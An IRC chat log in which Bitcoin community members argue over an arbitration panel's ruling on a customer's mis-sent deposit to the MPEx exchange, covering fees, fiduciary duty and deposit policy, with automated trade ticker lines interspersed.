21 21:42:40 http://trilema.com/2013/case-i-wences-vs-mpex-breach-of-fiduciary-duty/ Jan 21 21:42:42 dude sent wrong amount, it seemed like mircea_popescu was trying to help him sort it out Jan 21 21:42:43 i'm not feeling mad, I'm feeling as if I disappointed someone Jan 21 21:43:00 did he then demand rota justice or did mircea_popescu Jan 21 21:43:01 regardless, someone was going to get disappointed Jan 21 21:43:28 it was engaged because instead of mircea_popescu just being a normal human, he used a customer service case to not fix the issue so he could force his customer to sue him to get justice, just so he could promote his rota Jan 21 21:43:43 [MPEX] [S.BBET] 5000 @ 0.00100013 = 5.0007 BTC [+] Jan 21 21:43:45 [MPEX] [S.BBET] 1000 @ 0.00100012 = 1.0001 BTC [-] Jan 21 21:43:46 [MPEX] [S.BBET] 230 @ 0.00100011 = 0.23 BTC [-] Jan 21 21:43:47 [MPEX] [S.BBET] 500 @ 0.0010001 = 0.5001 BTC [-] Jan 21 21:43:48 [MPEX] [S.BBET] 500 @ 0.00100009 = 0.5 BTC [-] Jan 21 21:43:49 [MPEX] [S.BBET] 770 @ 0.00100006 = 0.77 BTC [-] Jan 21 21:43:51 which is fine by me and we obviously did a bad job Jan 21 21:44:05 like, it's totally the mission of a judge to please everyone Jan 21 21:44:10 so what's the point now? to learn from it Jan 21 21:44:10 yeah you did tbh Jan 21 21:44:17 or just get shit on Jan 21 21:44:42 FWIW i 'm not seeing any volunteers Jan 21 21:44:55 you have about 11 months to get your shit together Jan 21 21:45:11 its obviously the guys fault but forcing the rota to deal with it is not good for either rota or mpex imo Jan 21 21:45:12 if you are going to make a point that people can use your rota and it is a good alternative dispute method, forcing the issue on something like this when you just should have credited the dide without all the hassle is shitty Jan 21 21:45:32 pigeons i should have credited the dude w/o the hassle ? Jan 21 21:45:39 pigeons, it would be good if you included the reasoning in your judgement Jan 21 21:45:45 he's absolutely the last guy who sends ANY ammt to mpex and gets crtedited. Jan 21 21:45:49 my reasoning was included, Jan 21 21:45:54 that's a certainty. Jan 21 21:46:01 "MPex does disclaim responsibility for customer errors in depositing, but correcting this error is a reasonable part of fiduciary duty." Jan 21 21:46:06 the problem is the fees, not the deposit Jan 21 21:46:14 that's where the uncertainty is Jan 21 21:46:25 to me, the fee is negligible given the deposit amount Jan 21 21:46:34 what fees? Jan 21 21:46:38 how;s the relation relevant ? Jan 21 21:46:41 i wanted to include that i thought the rota was a good idea and didnt expect mircea_popescu would pt barnum it Jan 21 21:46:44 but i see now it is not negligble at al Jan 21 21:47:00 the fee is just a bonus Jan 21 21:47:11 we're talking about .00005 at max bitcoin transaction Jan 21 21:47:12 pigeons the reason nobody was using it was (i understand now) the justified fear that people are not equipped to judge. Jan 21 21:47:18 in fees for the 130 btc Jan 21 21:47:23 sadly this was proven true, luckily it was proven true on a modest case of little import. Jan 21 21:47:26 for all the ORTA fees are just icing on the cake Jan 21 21:47:43 so does MP get the neg rating? Jan 21 21:47:48 the 20 btc in fees is icing on the cake for someone Jan 21 21:47:51 it always will be Jan 21 21:47:55 or just the 100btc loss Jan 21 21:48:00 130* Jan 21 21:48:10 jcpham: explain the fees thing Jan 21 21:48:34 so we think or we know it was his funds and we decide to return the funds Jan 21 21:48:49 straight away once that decision is made, the fess are what decides everything Jan 21 21:48:57 the fee split Jan 21 21:48:59 i know it says dont fuck up your deposits, and im careful cause i know mircea_popescu will keep it, but if he's gonna use this to try to push his rota, well fact is it is a breach of fiduciary duty it is totally reasonable to fix this when shown proof Jan 21 21:49:35 i was considering doing that, yes. Jan 21 21:49:37 also the whole fiduciary duty claim is only relevant given non-refund Jan 21 21:49:43 but i'm not happy with how it works, so i won't do it in the future. Jan 21 21:49:45 mircea_popescu: what changed? Jan 21 21:49:51 dub about what ? Jan 21 21:50:05 so assume we determine the funds to be his, and we also determine that funds will be returned, there is no breach Jan 21 21:50:09 about considering refunding him if/when shown proof Jan 21 21:50:21 jcpham: no Jan 21 21:50:27 dub historically if you sent the wrong amt you're fucked. Jan 21 21:50:33 i was considering changing this policy, via the rota. Jan 21 21:50:39 mircea_popescu could have settled with the guy then there was no breach Jan 21 21:50:43 it failed to work, so i'm going back to what historically worked very well. Jan 21 21:50:50 mircea_popescu: I don't understand how the rota could change that, its your policy Jan 21 21:50:58 i was considering relaxing it. Jan 21 21:51:02 but mircea_popescu forced him to sue cause mircea_popescu wanted to promote his rota, and we are his pawns in that Jan 21 21:51:06 the rota is a binary decision maker, not a policy generating device Jan 21 21:51:07 mircea_popescu did wences ask for his money back Jan 21 21:51:12 i assumed that he DID NOT Jan 21 21:51:19 surely. Jan 21 21:51:29 i see Jan 21 21:51:33 my ruling stands Jan 21 21:51:49 i'm not discussing this anymore Jan 21 21:51:59 we are a cheap customer service department for him Jan 21 21:52:02 I don;t understand how it went from trying to help the guy to rota Jan 21 21:52:10 see pigeons Jan 21 21:52:12 pigeons, did you ask about logs between mircea and wences? to confirm if mircea forced him to sue ? Jan 21 21:52:22 or it's just your assumption? Jan 21 21:52:24 good point jurov Jan 21 21:52:34 now i know that i need to interrogate everyone Jan 21 21:52:35 jurov: i asked mircea_popescu Jan 21 21:52:56 it is also in the comments on the general rota post Jan 21 21:53:23 changing the policy via the rota? Jan 21 21:53:24 it was understanding that the parties didn't try to resolve it amicably - straight to rota, no discussion Jan 21 21:53:41 now that i know discussion came before the rota case Jan 21 21:53:46 no, mircea_popescu coached wences on how to format his claim Jan 21 21:53:48 i'm much more firm in my decison Jan 21 21:54:08 fucking precedent or not Jan 21 21:54:40 pigeons wait, what's the problem with that exactly ? Jan 21 21:54:48 i didnt mind the keep your money policy too much but he made him bring this case, and no way i can find that it is reasonable in this instance Jan 21 21:55:22 it makes no sense if that is true Jan 21 21:55:25 mircea_popescu: the problem is this isn't an organic dispute, you would have paid the guy, but you decided if you made him go through the rota you would get publicity for it Jan 21 21:55:35 no, actually, i wouldn't have paid the guy. Jan 21 21:55:56 ok then the rota did its job Jan 21 21:56:00 yay rota Jan 21 21:56:09 *shrug* Jan 21 21:56:16 mircea_popescu: it says in your sumbission that you would be prepared to pay him Jan 21 21:56:28 since he sued. Jan 21 21:56:40 i thought mircea_popescu's submission was an offer to settle without going through this, but when i spoke with him he said no Jan 21 21:56:41 next time someone tries that i'll just ignore it and that's the end of that story. Jan 21 21:56:55 problem solved. Jan 21 21:57:06 basically yay rota, it managed to lock itself out of pretty much the only subject matter anyone thought it worthy of considering Jan 21 21:57:08 [HAVELOCK] [SDICE] 39 @ 0.53 = 20.67 BTC [-] Jan 21 21:57:09 mircea_popescu: that doesnt make an sense, your policy is that he would not be refunded, why would that change during a rota case? Jan 21 21:57:18 not entirely sure if that means it'll just die in a corner somewhere, but seems quite likely. Jan 21 21:57:27 if rota decided with what you agreed, you would have made it policy Jan 21 21:57:33 and used the rota to back your policy Jan 21 21:58:04 I think this is actually a win for mircea_popescu Jan 21 21:58:05 but since it decided against you it isnt good policy what the rota decides Jan 21 21:58:17 i can't see how it can be a loss Jan 21 21:58:20 other than 9btc Jan 21 21:58:22 pigeons if it made a reasonable decision it might have i nthe future had more important stuff brought before it. Jan 21 21:58:25 of course its a win, he either didnt have to pay, or else his rota gets promted and he pays what he owed Jan 21 21:58:29 if it made an unreasonable decision it likely won't. Jan 21 21:58:43 hard enough to push the concept as it is, even if we were to believe judges are marginally qualified and someqwhat sane Jan 21 21:58:56 if we don't believe either of those it's a dead sell, no matter how hard i push it Jan 21 21:58:59 and i don't push dead sells. Jan 21 21:59:05 if the guy had been forced to use the rota and lost, incurring further cost it would be even more of a joke Jan 21 21:59:09 well it won't be very useful if its only used for what you bring forward to it Jan 21 21:59:23 dude. kids are born toothless Jan 21 21:59:28 wtf is an mpex custoemr service dispute doing in rota Jan 21 21:59:28 and they only chew what their parents bring to them Jan 21 21:59:34 dub: exactly Jan 21 21:59:41 what did you expect, to start by considering a five million btc case ? Jan 21 21:59:47 dub: actually, the reason is so he can promote his rota Jan 21 22:00:00 pigeons: then your decision is double wrong Jan 21 22:00:03 no. the reason is so that you people can show you can judge. Jan 21 22:00:16 it's what's known as an opportunity. Jan 21 22:00:32 the only thing i can possibly imagine that we did wrong was split the fees incorrectly Jan 21 22:00:43 no one will convince me otherwise Jan 21 22:01:09 pigeons: 1) because the policy 'wences' agreed to by using mpex is clear and you ruled against that. 2) mpex would have looked a lot worse having forced the use of rota then winning Jan 21 22:01:30 jcpham that's pretty much it. you allocated the cost of fucking up to the party that didn't fuck up. Jan 21 22:01:49 could not make someone pay to get justice Jan 21 22:02:06 ahahahaah Jan 21 22:02:11 baby, socialism is for fiat. Jan 21 22:02:13 this is btc. Jan 21 22:03:41 I think you caused this by using the rota for something so trivial tbh Jan 21 22:04:04 i am very upset this was a rota case Jan 21 22:04:07 next rota case, should I have cornflakes or museli for breakfast Jan 21 22:04:42 so does mircea_popescu get neg rated? Jan 21 22:05:10 dub it's unavoidable it will start small. Jan 21 22:05:17 people won't risk their money on something untried. Jan 21 22:05:23 and in retrospect that is a wise approach. Jan 21 22:05:26 that is what the whole thing is about right? judges donate their reputation to uphold the reputation of others Jan 21 22:05:34 dub: he does if he fails to make good on the judgement Jan 21 22:06:22 I see Jan 21 22:07:39 whence all this arrogance anwyay ? Jan 21 22:07:40 a tx fee and a lot less time could have resolved this Jan 21 22:07:43 "something so small Jan 21 22:07:52 " ? what bs is that. Jan 21 22:07:59 do something small well. Jan 21 22:08:21 something small like customer service? Jan 21 22:08:36 something small like whatever can be had. Jan 21 22:08:55 mircea_popescu: nah, its a dumb thing for the rota Jan 21 22:09:12 you're not part of the scotus, just yet. so, you know, little room to thumb nose. Jan 21 22:09:14 look at the notes in the comments, you are agreeing to reimburse him Jan 21 22:09:32 dub yes, it was a simple case. Jan 21 22:09:46 so he got his money back, good result? Jan 21 22:09:51 it is the fees, dub Jan 21 22:10:11 there is an idea that the fees represent Jan 21 22:10:12 why is the rulling against you a problem if thats what the rota is for, processing your customer service enquiries Jan 21 22:10:32 dub because now any of the judges can start spamming my address with 100 btc payments Jan 21 22:10:33 apparently we shit on that idea Jan 21 22:10:33 sueing Jan 21 22:10:37 it shows that if you expect service from mircea_popescu you better pay to sue him and win Jan 21 22:10:38 then getting paid for the process. Jan 21 22:10:41 it's a fucking hole. Jan 21 22:11:01 so you wanted to win, then pay him back? Jan 21 22:11:04 1) if the claimant paid the funds Jan 21 22:11:13 dub the idea was to allocate the win neutrally. Jan 21 22:11:14 2) if the claimant can prove ownership of said funds Jan 21 22:12:12 mp paid 9 btc to get his rota promoted and scare people into being more careful depositing because of raised awareness of the hassle of errors Jan 21 22:12:15 a bargain Jan 21 22:12:40 mircea_popescu: you appear to agree to return the funds or are at least satisfied with his signing of the message, if you had won the case would have looked even more retarded Jan 21 22:12:54 dub : they could have allocated fractional. Jan 21 22:13:09 pigeons what happens now if you send 100.0 btc, sue, get back 100 + 10 fee + 3 for judging it ? Jan 21 22:13:16 am i out 3 btc for each 100 you send ? Jan 21 22:13:19 bank. Jan 21 22:13:21 that's what Jan 21 22:13:41 i dont know mircea_popescu that isnt clear to me Jan 21 22:13:49 heh. Jan 21 22:13:50 ^ Jan 21 22:13:51 where does the 3 come from Jan 21 22:13:56 we tried asking Jan 21 22:14:04 i thought i answered, but again : Jan 21 22:14:05 we thought it came from the looser's 10 Jan 21 22:14:16 two parties to any trial. each contributes 10 btc, for a total of 20. Jan 21 22:14:20 either mpex policy is 'you fuckup the deposit you lose it, no question' or 'don't fuckup but we may be able to fix it' Jan 21 22:14:20 as i understand it: each case will have at least 20 btc in fess paid Jan 21 22:14:23 3 judges to any trial, each gets 3 btc, for a total of 9. Jan 21 22:14:29 ok, winner gets his 10 back then that leaves 1 Jan 21 22:14:35 3 judges at 3btc apiece leaves 11BTC to split in every case Jan 21 22:14:36 the winner gets a fraction of 10 btc = to the % he's allocated. Jan 21 22:14:50 i would have charged you more than 140 if i could have Jan 21 22:15:03 but his is whole at 140 Jan 21 22:15:08 he is whole at 140 Jan 21 22:15:16 very odd. Jan 21 22:15:29 130 + 10 fees you caused him to incur Jan 21 22:15:29 you know, money isn't soemthing to be redistributed to the needy. or do you ? Jan 21 22:15:38 in my mind it takes little to no effort to refund someone Jan 21 22:15:42 you still haven't answered the above question. Jan 21 22:15:46 how much effort is actually required Jan 21 22:15:53 he isnt needy, its his money Jan 21 22:16:08 pigeons what happens now if you send 100.0 btc, sue, get back 100 + 10 fee + 3 for judging it ? <<< this. Jan 21 22:16:17 i dont know Jan 21 22:16:17 do you plan to answer or should i just drop it ? Jan 21 22:16:19 rigjht. Jan 21 22:16:20 that's over my head Jan 21 22:16:26 well tell you what, that's no way to judge. Jan 21 22:16:28 well i'd get 113 BTC Jan 21 22:16:35 i know 4 other people who can do the same Jan 21 22:16:40 100 times a day. Jan 21 22:16:41 mircea_popescu: you should have thought about it before using a court to settle stupid shit Jan 21 22:16:52 dub all shit to be settled is stupid Jan 21 22:16:54 you owed him 130, the fees were to be allocated, since you caused the fees, you pay them not him Jan 21 22:16:59 if it weren't stupid it wouldn't end in a court. Jan 21 22:17:07 he got the same amount back that he spent, you lost the case, you incur charges Jan 21 22:17:16 pigeons i didn't "cause" him to send rounded numbers dood. Jan 21 22:17:22 no way you get anything of the fees when you could have settled it without rota Jan 21 22:17:41 you didnt cause it, it is reasonable that you credit him Jan 21 22:17:44 you diudnt, you pay Jan 21 22:18:13 yeah, well, i guess this shows why the random person, even if well meaning, can not be a judge. Jan 21 22:18:21 damn Jan 21 22:18:24 you did cause the rounded anyway, by your retarted one address deposit system Jan 21 22:18:35 ^^ Jan 21 22:18:37 lol mkay. Jan 21 22:18:38 it is kinda obtuse Jan 21 22:18:52 dub kakobrekla pigeons IT CREATES ANONIMITY Jan 21 22:18:57 are you fucking nuts ? ffs. Jan 21 22:19:14 jesus christ Jan 21 22:19:21 just like bit bet Jan 21 22:19:36 you guys should make bets on rota disputes from now Jan 21 22:19:40 maybe you can clean up Jan 21 22:19:47 lol why'd anyone bet on that ? Jan 21 22:20:10 the fact that all btc goes to the same address means nobody's deposits or withdrawals can be traced. Jan 21 22:20:12 (12:18) < pigeons> you did cause the rounded anyway, by your retarted one address deposit system << this is amazing Jan 21 22:20:43 are you guys IT people? Jan 21 22:20:50 what do you guys do for a living? Jan 21 22:20:56 nature is amazing. ~ ron swnson Jan 21 22:20:57 at first glance this seems open and shut, he failed to utilise mpex per teh conditions he agreed to, he loses Jan 21 22:21:11 it wasnt a case against the breach of conditions Jan 21 22:21:28 but in the 'case notes' there is some arbitaration and an inferred agreement to refund, so a win for the claimant is the intuitive result Jan 21 22:21:32 it was breach of fiduciary duty, which he did breach cause he failed to take a reasonable action Jan 21 22:22:00 i asked prior about that inferred agreement and mp said it wasnt what it appeared to us Jan 21 22:22:11 but yeah sure looks like one to me too Jan 21 22:22:31 aaanyways. Jan 21 22:22:35 still need rassah's ruling Jan 21 22:22:37 i think this has been discussed to it's demise Jan 21 22:24:09 i wonder what's gonna be the next one Jan 21 22:24:19 wow the fact that you actually expected to win is shocking Jan 21 22:24:37 i didn't expect to win dood. Jan 21 22:24:42 its not about who won the case. its about the damn ruling. Jan 21 22:24:45 i expected the guy to win his 130 btc back. Jan 21 22:24:52 jesus fucking christ. Jan 21 22:24:55 [MPEX] [S.MPOE] 4817 @ 0.00061302 = 2.9529 BTC [+] Jan 21 22:24:57 [MPEX] [S.MPOE] 12783 @ 0.00061358 = 7.8434 BTC [+] Jan 21 22:24:58 i feel like im taking crazy pills Jan 21 22:25:08 mod6 blue or red ? Jan 21 22:25:30 why didnt you just pay him instead of making us go through this if you expected him to win? Jan 21 22:25:41 why would the system award you anything for acting in bad faith Jan 21 22:25:48 pigeons so that you may prove yourselves as actually takeable seriously as judges Jan 21 22:25:54 in spite of no qualifications, prior experience etc. Jan 21 22:26:05 bad call Jan 21 22:26:09 i guess lol Jan 21 22:26:12 So... can I use the rota for the unclaimed giga.etf case? =P Jan 21 22:26:18 well maybe we showed that, if we shilled we sure wouldnt have and you sure wouldnt have gotten any cases Jan 21 22:26:27 [MPEX] [S.MPOE] 1608 @ 0.00061358 = 0.9866 BTC [+] Jan 21 22:26:29 [MPEX] [S.MPOE] 3325 @ 0.00061374 = 2.0407 BTC [+] Jan 21 22:26:41 pigeons you forget it's a voluntary system. Jan 21 22:26:46 erring on either side is equally bad. Jan 21 22:26:54 it has to be quite arrowstraight. Jan 21 22:26:58 well cause you think its an error doesnt make it so Jan 21 22:27:21 ... Jan 21 22:27:23 you lost, you caused the process by not settling beforehand, so you pay the fees Jan 21 22:27:30 dude. you created a pump. Jan 21 22:27:36 peopel can now claim infinite btc from me. Jan 21 22:27:38 i didnt creat e this Jan 21 22:27:38 no you did Jan 21 22:27:52 dont they still have to win? Jan 21 22:28:05 all it takes is for them to send rounded btc. Jan 21 22:28:06 its easy for you to fix though, just make the rule hard and fast, no refunds Jan 21 22:28:11 dub yup Jan 21 22:28:18 its in the ToS, deal with it Jan 21 22:28:24 mircea i don't understand one thing. why you can't just set a hefty fee for resolving mistakes? Jan 21 22:28:27 i have no choice, obviously. Jan 21 22:28:27 it was a rule, but mp told him to go to rota Jan 21 22:28:36 I think the rota did mpex a favour ruling this way Jan 21 22:28:41 jurov cause that's unfair to the poor. Jan 21 22:29:07 oh, so better take everything. i see. Jan 21 22:29:20 jurov hey, at least it's fair. Jan 21 22:29:35 its not fair, guy had to go through all this just to get his shit back Jan 21 22:29:38 dub well quite possibly. Jan 21 22:29:43 pigeons shit he missent. Jan 21 22:29:46 and MP gets publicity Jan 21 22:29:54 dude i dunno, seriously, mail your house keys to some random address Jan 21 22:30:00 then expect they pai Jan 21 22:30:15 for the tiome you couldn't go inside cause you didn't have your keys or w/e Jan 21 22:30:19 and the trouble of finding them again Jan 21 22:30:19 um wasnt random Jan 21 22:30:25 130.0 is random. Jan 21 22:30:29 no Jan 21 22:30:45 its the argument he gave to the deposit command Jan 21 22:31:06 what i most of all wonder is, Jan 21 22:31:15 why hasn't this lively debate take place in teh comment section ?! Jan 21 22:31:27 mircea, so if i mail the keys, they get to keep the house? is it what you're saying? Jan 21 22:31:32 cause no one wants to email you to get credits to read a web page Jan 21 22:31:45 comments are always free ?! Jan 21 22:31:54 nope i can only see this one page Jan 21 22:32:06 dude... comments are always and in all circumstancess visible. Jan 21 22:32:37 i think if you want to preserve this in posterity for all to comment on, it needs to be moved elsewhere Jan 21 22:32:43 it's very personal right now Jan 21 22:33:17 i dun particularly want to preserve it Jan 21 22:33:46 ^ Jan 21 22:33:55 lets all agree it was a fuckup and forget about it Jan 21 22:34:06 nope we all think we are right Jan 21 22:34:13 maybe there will be a real case for the rota one day but it now seems unlikely Jan 21 22:34:13 that's why it's so fascinating lol Jan 21 22:34:21 dub quite. Jan 21 22:34:48 hopefully the next judges will nt be so biased Jan 21 22:34:52 i doubt it has any relevance to anyone other than the ppl involved tho Jan 21 22:34:59 mircea, so if i mismail the keys, they get to keep the house? is it what you're saying? Jan 21 22:35:04 i think for everyone else its "o, that thing that couldn't have worked didn't ? o wow." Jan 21 22:35:07 mircea_popescu - the first person to create his own justice system, and the first to destroy his own justice system Jan 21 22:35:08 ^ can you at least reply to this? Jan 21 22:35:16 jurov no, you may ask for the keys back, and even get them Jan 21 22:35:20 but you can't get more ffs. Jan 21 22:35:35 dub justice is apparently too prudish for me. Jan 21 22:35:48 he didnt get more Jan 21 22:35:54 explain that please Jan 21 22:35:59 he paid 140 and got 140 Jan 21 22:35:59 metaphorically, wences got back his own keys plus a nother set of keys to another house? Jan 21 22:36:01 but in this case it's like they told me they're moving into the house, it's reasonable Jan 21 22:36:10 this is literally "he should get the keys, the stamps for having asked and if we could we'd have given him all paid tow weeks vacation to boot" Jan 21 22:36:10 courts award costs to the winner, fyi Jan 21 22:36:22 the idea is teh winner goes away without having lost money Jan 21 22:36:25 pigeons: paid 130 and got 140 surely? Jan 21 22:36:26 right Jan 21 22:36:40 markedathome: he paid 140 130 +10 fees Jan 21 22:36:44 markedathome: he paid a 10btc fee to use the rota Jan 21 22:36:59 the only other option i would've entertained was for both parties to lose Jan 21 22:37:04 oh right. Jan 21 22:37:52 to an outsider reading that blog post it actually look slike the rota worked fine Jan 21 22:38:18 should all be done in irc and log posted Jan 21 22:38:19 aside from mircea_popescu taxing himself 10btc to handly a customer service case Jan 21 22:38:20 yes, yes it does Jan 21 22:38:51 then, he might have paid someone 10 btc to handle it Jan 21 22:39:05 dub it reads like mp taxing himself to create the system, and paying people to be idiots and subvert deposit process. Jan 21 22:39:09 10btc is pretty cheap for 3 judges Jan 21 22:39:16 sorta like i'm the government, i guess. Jan 21 22:39:21 except in btc there's no such thing. Jan 21 22:39:33 [MPEX] [S.MPOE] 8100 @ 0.00061132 = 4.9517 BTC [-] Jan 21 22:39:45 even internet judges Jan 21 22:40:17 mircea_popescu: you eveil, evil state you Jan 21 22:40:22 what would the difference have been with something like judge.me? Jan 21 22:40:22 basically this is a ruling saying "it is right and proper for people to disregard instructions and send anything they want to mpex" Jan 21 22:40:36 which is pretty boneheaded. Jan 21 22:40:40 i do not agree with that Jan 21 22:40:45 no but it happens, especially with the weird deposit system Jan 21 22:40:46 neither Jan 21 22:40:48 i see your point, but based on the details of this case Jan 21 22:40:50 that is not true Jan 21 22:40:53 pigeons "it happens" ? Jan 21 22:41:08 and when it does happen, and you've shown mpex that you made it error, they dont fix it, hence the rota decision Jan 21 22:41:09 no. it is ruling saying "it is improper for mpex to keep everything if user makes a mistake" Jan 21 22:41:24 especially if the user sends the correct deposit Jan 21 22:41:26 jurov yeah. same thing. Jan 21 22:41:27 mistakes dont happen mircea_popescu ? Jan 21 22:41:28 mircea_popescu: maybe offer, 1) anonymous deposit - lose at risk even with signed / authenticated ownership Jan 21 22:41:29 after the mistake Jan 21 22:41:37 pigeons mistakes are paid for BY THOSE WHO MAKLE THEM Jan 21 22:41:39 2) custom addresses - lose anonymity Jan 21 22:41:41 not by those who have the most money. Jan 21 22:41:47 not by those who are the bigger entity Jan 21 22:41:57 not by those who we identify as "the man" in our misguided quest for social justice. Jan 21 22:41:58 etc. Jan 21 22:42:03 mircea_popescu: actually, it was reasonable in this case to resolve his mistake, that was the ruling Jan 21 22:42:25 no, its a ruling saying 'if you are going to enter into arbitration regarding incorrect depost amounts, do that privately' Jan 21 22:42:36 dub cheeky ruling then. Jan 21 22:42:50 if that actually is the case, i should certainly dissolve it. Jan 21 22:43:15 [MPEX] [S.MPOE] 7325 @ 0.00061374 = 4.4956 BTC [+] Jan 21 22:43:17 [MPEX] [S.MPOE] 8844 @ 0.00061495 = 5.4386 BTC [+] Jan 21 22:43:26 control freak Jan 21 22:43:35 in a real court if you forced a case to be raised, then during the hearing capitualted to the other party, the court would probably impose an additional fine on you for wasting its time Jan 21 22:43:39 no but wtf bs is this, "We are too good for the case at hand" Jan 21 22:43:59 dub the idea here is to create a new system, not to rehash the old. Jan 21 22:44:12 dub: that is exactly how i felt Jan 21 22:44:16 the entire point is to have voluntary courts, which is to say, courts which can be relied on to be fair. by both parties. Jan 21 22:44:18 well then the rota wasn't what I and apparently others thought Jan 21 22:44:26 well i guess not. Jan 21 22:44:39 fairness is a relative term Jan 21 22:44:58 it was fair to both parties, wences was made whole, mp lost nothing other than the fees Jan 21 22:44:59 jcpham in no interpretation of fairness can you promote a judgement based on one single party's pov. Jan 21 22:45:05 "he paid 130+10 and should get back 140" Jan 21 22:45:07 that's fine. Jan 21 22:45:15 I understand how mircea_popescu feels though Jan 21 22:45:19 but it's half the story, and not good enough. Jan 21 22:45:19 mircea_popescu: that's absolutely the issue Jan 21 22:45:50 I took a guy to court for selling me a boat that leaked, the ruled in his favour because we didnt have anything about it not leaking in a contract Jan 21 22:46:00 "nothing other than the fees" is btc. Jan 21 22:46:00 true story Jan 21 22:46:09 any judgement involving mircea_popescu keeping something would have had to show he was being reasonable, and he wasn't Jan 21 22:46:11 had to pay his fees Jan 21 22:46:16 i'd like to know where the original wording is..... Jan 21 22:46:19 " reasonable" ?! Jan 21 22:46:25 if i'd have a policy saying to clients "if you make a mistake, screw you" and there's no real reason why it has to be so, it's only reasonable the court would say "screw your policy" Jan 21 22:46:26 wtf is that lol. Jan 21 22:46:35 the orginal wording were it says mpex keeps funds mistakenly sent or incorrect in size Jan 21 22:46:39 jurov no, it's not. the court isn't above the contract Jan 21 22:46:47 again, this isn't fiat world and socialist government imposing it. Jan 21 22:47:01 jcpham it's in the old options page somewhere Jan 21 22:47:12 i know it is somewhere Jan 21 22:47:16 because i remember readin it Jan 21 22:47:32 DEPOSIT|{sum}, where the sum is an integer, written in BTC (note that you can not deposit less than 10 BTC). You will be quoted an exact sum, which you must send to the exchange address (1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx). Don't round anything, the decimals are there to identify you as the beneficiary. You will be credited the full amount. Jan 21 22:47:36 i thought about giving it to mp since he does say he keeps errors, but in law that wont hold up, thats not reasonable Jan 21 22:47:37 there's that in the current faq Jan 21 22:47:38 the court isn't above the contract... who decided, you? Jan 21 22:47:45 rota just decided else Jan 21 22:47:45 jurov yes. Jan 21 22:47:52 well rota is well fucked then. Jan 21 22:47:56 even if a contract spells that and this happened a court rules this way Jan 21 22:48:07 yes but i thought there was wording that said something along the lines of "if it is wrong, you do not get it back" Jan 21 22:48:15 jcpham there's gonna be lol. Jan 21 22:48:15 which is a customer service nightmare Jan 21 22:48:35 if you relegate me to customer service, I'm going to serve your customers Jan 21 22:48:39 for better or worse Jan 21 22:48:49 that's not what a judge does. Jan 21 22:48:57 turns out this banal case was actually incredibly fucking intricate huh. Jan 21 22:48:57 i wouldn't think so either Jan 21 22:49:00 but here we are. Jan 21 22:49:18 i think everyone had the best intentions Jan 21 22:49:23 im pretty sure, yeah. Jan 21 22:49:48 but i squarely don't see how anyone would ever consider responding to a case, ever. Jan 21 22:50:17 i mean, why ? run the risk of purely unilateral sidetaking... to what avail ? makes no sense. Jan 21 22:50:42 the next case may be unilateral against the claimant Jan 21 22:50:57 that's no consolation. Jan 21 22:51:00 yeah you always run the risk of unilateral sidetaking Jan 21 22:51:00 the fees are the only way you have been harmed Jan 21 22:51:04 if people wanted to gamble they'd go to sdice Jan 21 22:51:25 this was just clearcut mircea_popescu you owed him the money, he won, loser pays fees Jan 21 22:52:03 it seems the real precedent is the loser pays the fees Jan 21 22:52:19 but i don't like the winner/loser description Jan 21 22:52:39 it wasn't necessary to frame this case this way imho Jan 21 22:52:47 if another case it works out differently fine, that doesnt have to be a precedent, but in this case the fees were clearly incurred by mircea_popescu being unwilling to work out the issue despite having the facts beforehand Jan 21 22:53:39 pigeons except the loser is the party that made no mistake. Jan 21 22:53:47 which is insane. Jan 21 22:54:00 the implication is that the "mistake" was not returning the funds Jan 21 22:54:09 as quickly as possible Jan 21 22:54:15 [MPEX] [S.MPOE] 12600 @ 0.00061495 = 7.7484 BTC [+] Jan 21 22:54:32 if the guy hadn't send the correct amount Jan 21 22:54:47 this can not be a mistake. it's not part of the deal. Jan 21 22:54:48 i can see him not getting his money back Jan 21 22:54:48 its pretty well established in law actually that you don't pay for mistakes Jan 21 22:54:58 the court can't substitute its own moral judgements for the contract between the parties. Jan 21 22:55:17 can't it Jan 21 22:55:19 he fulfilled his contract, sent the money, but he made a mistake Jan 21 22:55:29 he did not fulfill his contract, no. Jan 21 22:55:33 you had the obligation to fix that for him Jan 21 22:55:36 nope. Jan 21 22:55:43 well then how come you lost? Jan 21 22:55:46 i had no such obligation, quite specifically. Jan 21 22:55:52 because i was nice and you were stupid, tbh.\ Jan 21 22:55:56 i would seem that due to the lack of rules, the rota can make all sorts of WILDLY INACCURATE decisions Jan 21 22:56:04 jcpham yeah. Jan 21 22:56:19 reading the above, i now regred i didn't more clearly stress the supremacy of contract point Jan 21 22:56:28 i can clearly see in retrospect how this "obvious" point was only obvious to me. Jan 21 22:56:40 no but even a written contract saying that mistakes in deposits are kept would have resulted the same Jan 21 22:56:48 that's idiocy. Jan 21 22:56:55 because the intent of the contract is obviously what's material Jan 21 22:57:01 i'm still looking for the actual wording on MPEX (now) Jan 21 22:57:12 where it says incorrect deposits are kept Jan 21 22:57:14 jcpham i quoted it above, grep deposits Jan 21 22:57:17 because this fact was discussed Jan 21 22:58:02 i knew this was policy, but in this particular case, it was reasonable that mircea_popescu credit the amount showed to have been sent Jan 21 22:58:16 pigeons i guess so. Jan 21 22:58:25 what's unreasonable tho, is to expect me to pay the costs of doing so. Jan 21 22:58:39 the /faq.html entry for DEPOSIT{sum} I thought would have had the same text as that of the command (in fact all of the commands should) Jan 21 22:58:58 which costs, your time was unavoidable here, but you didnt have to pay the fees if you settled before rota Jan 21 22:59:02 to be even more specific mircea_popescu Jan 21 22:59:08 I thought you had specifcs, like Jan 21 22:59:16 when it first opened Jan 21 22:59:29 there was a sentence saying you didn't return deposits that were wrong Jan 21 22:59:36 pigeons why would i "settle before the rota" ? what bs is that? Jan 21 22:59:46 jcpham let me dig it up Jan 21 22:59:49 because you had all the info we had Jan 21 22:59:56 why should this have gone to rota? Jan 21 22:59:58 i would like to re-read it if it still there Jan 21 23:00:11 only reason (other than bad faith wanting to promote rota) would be you didnt want to pay Jan 21 23:01:23 Before sending the sum quoted you have to send an email containing at the very least the address you want benefits (through either the later exercise or sale of your contracts) forwarded to and the sum quoted to you. This allows you to be identified. If you fail to do this it may be impossible to ever identify you as the owner of the respective contracts/bitcoins, and so they may be forever lost. Jan 21 23:01:24 it shouldnt have gone to rota because he made it clear to you he paid the money Jan 21 23:01:40 pigeons he only made it clear at the rota, actually. Jan 21 23:01:46 once he finally signed the thing Jan 21 23:02:12 i suggest a new irc channel for this discussion should it arise again Jan 21 23:02:24 possibly a new forum format Jan 21 23:02:25 why, we drownign out the assbot ? Jan 21 23:02:37 naw Jan 21 23:02:37 im not doing a forum, but an irc channel 